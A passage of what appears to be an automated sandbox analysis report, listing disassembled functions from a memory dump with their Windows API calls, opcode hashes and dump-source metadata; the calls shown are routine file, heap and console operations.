                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: QueryValue$ErrorLastOpen
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4270309053-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a5a04369c9cbf64470e7453927dec799bee2165ba201eb7bd0098085123dc6be
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d4e265fd8490503a17aa735c8291f0f79b55517831243c8fd906568c855882cc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5a04369c9cbf64470e7453927dec799bee2165ba201eb7bd0098085123dc6be
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D21FCB1E01219AFEB119F9898819FFB6BDEB49750F14812AE501B7241D7768E408BA1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00039FF8 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003A034
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00450052,-00000209,00000000,?,-00000209,0020005D,0001234C,0020005D), ref: 0003A078
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0003A0AA
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,0020005D,0001234C,0020005D), ref: 0003A0C2
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DriveFullNamePathType
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3442494845-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e73a5d6b8d3288474f08794c289cc8c9b20526b2fd3fdc1dbfe83c30af111e1b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 79dca32ace0e32c51c790bbaa2f007543b5f6875b5bc5a6aa469f0d6c018c485
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e73a5d6b8d3288474f08794c289cc8c9b20526b2fd3fdc1dbfe83c30af111e1b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE216571B0021A9BDB25DFA9DD899AFBBFCEF49304F0401AAA545D3241D634DA448AA2
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00022960 Relevance: 6.1, APIs: 4, Instructions: 76stringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 00022977
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 00022987
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0001E559,?,?,00000000,?), ref: 000229FF
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0001E559,?,?,00000000,?), ref: 00022A09
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcstol$lstrcmplstrcmpi
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4273384694-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 36e9d958d3830d2ba72ef457e3eed23b49392c96e31754f5fa137a5efd9f79e4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f58a589e03d15ba28854c4459b6feefe84fbbb29a1ec71abb3155fd7716d6551
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36e9d958d3830d2ba72ef457e3eed23b49392c96e31754f5fa137a5efd9f79e4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF110632900236BB87715BF8AA0897EBAA8FF05350F160611E801DB910D365EE90E6E4
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0003C535 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003C56B
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 0003C5A5
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0003C5BD
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,00000001,00000000,00000000), ref: 0003C5DA
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DriveNamePathTypeVolume
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1029679093-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 37636d72f5a4ceff67b46627622d80cd53672e9512703f192bbde35ab83e4ee6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8669fd66048062aaaa100dc72a4507603f97f20c8be8ab490b61cb661259f519
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37636d72f5a4ceff67b46627622d80cd53672e9512703f192bbde35ab83e4ee6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93216032B102596BEB21DBA5DC89FEFBBFCEB44344F040469A505E3141E678EA848B61
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00024C40 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3634c6dc22f4166f2b33edf7b5f6be4d25248955c5f0f79cdca8e4661ed57213
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 78c718795180c9ac0ac86baf89091df17fee4bcabae3341ccdabecf98d3e21d5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3634c6dc22f4166f2b33edf7b5f6be4d25248955c5f0f79cdca8e4661ed57213
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45110835202604ABEB669B249C69FEFB69DEF82324F144105F812C21D1DB74DD018752
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00039809 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00039822
                                                                                                                                                                                                                                                                                                                                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000392EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0003982A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00039841
                                                                                                                                                                                                                                                                                                                                                                                                                          • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 0003986E
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2448200120-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0cb013694fca8f8d66f156a4800b368b69ca23eab5d79e28d43cf95011fcb05d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9bcd98ab9f6ee4bac82e3849a9f7208648b085338a3ef78fd470b52bd02278e4
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cb013694fca8f8d66f156a4800b368b69ca23eab5d79e28d43cf95011fcb05d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A112771700200AFEB269B62DC49ABF33ADEFC7715F10011AF40182051DFB98C40CA66
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00017221 Relevance: 6.1, APIs: 4, Instructions: 61memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00039962,00000000,?,00000000,0002CF94,00000000,?), ref: 0001727F
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 00017286
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 000172AF
                                                                                                                                                                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 000172B6
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c634c03812fcc5c82d114e88c99ecdaf7967235bf0194a48bb66ba865bbc8b3b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: eb78321b345c88ac9866e8ab3a2f6df2baf6c2374121cd669fb3e82d5efd97b9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c634c03812fcc5c82d114e88c99ecdaf7967235bf0194a48bb66ba865bbc8b3b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5511E2712086009BEB24AF649805BBA3BF5AF86311F24484DF59A8B252DB38D883D765
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000162C8 Relevance: 6.1, APIs: 4, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00000000,00000000,00016231,00000000,00000000,25170B64), ref: 0001630C
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00016313
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fe95fd89e91bc1d53bbf4b6308b6f9355d0e849e876053bdc65fe22ac849f99b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 057087a7f95b40de1cfadd153d8f8f8c88dbee860269aea3a98cdfc07edbb4c5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe95fd89e91bc1d53bbf4b6308b6f9355d0e849e876053bdc65fe22ac849f99b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3511883170062183DB245B119C14BFF6799AFC0B12F094119EE179B280CF2A9D8283A5
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001DD20 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,0001BDB3,00000000,?), ref: 0001DD37
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0001DD3E
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 0001DD53
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0001DD5A
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$Process$AllocSize
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2549470565-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d61ebeafccd98550da07bd90c7cb0df13e9309692ba364a07d0ed76b16a98b6e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f71317ee66c6c413aff373e01f7ba93cced03f6be7e510bf442e0d62fbd44c93
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d61ebeafccd98550da07bd90c7cb0df13e9309692ba364a07d0ed76b16a98b6e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2901B176344311ABDB21AB64FC88EDA77A9EB81756F200523F609C7050EB35DC84D7A1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00038496 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00018A51), ref: 000384B9
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00018A51), ref: 000384C6
                                                                                                                                                                                                                                                                                                                                                                                                                          • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00018A51), ref: 000384EA
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00018A51), ref: 000384F2
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1033415088-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d3181f167ae26cddcbce061504bf82eebbb2dbe95ddac2d60c25f42e2cc72d58
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6e899c7291108065b690dd4a275d2e34f0d2b0db5921ac0ff410874b12373ee5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3181f167ae26cddcbce061504bf82eebbb2dbe95ddac2d60c25f42e2cc72d58
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5014471A10219AF9B059B74DC88AFFB7ECEF0E311B004269F602D2191EB289D05C765
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00025643 Relevance: 6.0, APIs: 4, Instructions: 46fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00020060: wcschr.MSVCRT ref: 0002006C
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000,00000000,00000000), ref: 00025678
                                                                                                                                                                                                                                                                                                                                                                                                                          • _open_osfhandle.MSVCRT ref: 0002568C
                                                                                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 000256A2
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0003122B
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 22757656-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2a1de4728820338b27de8992b9b52b3e68fe175597c256973e4173a8bfb22287
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d3aa87caaf91e3acbd8aee082d0dfc622260f7aee867c91573466bd99e8c9052
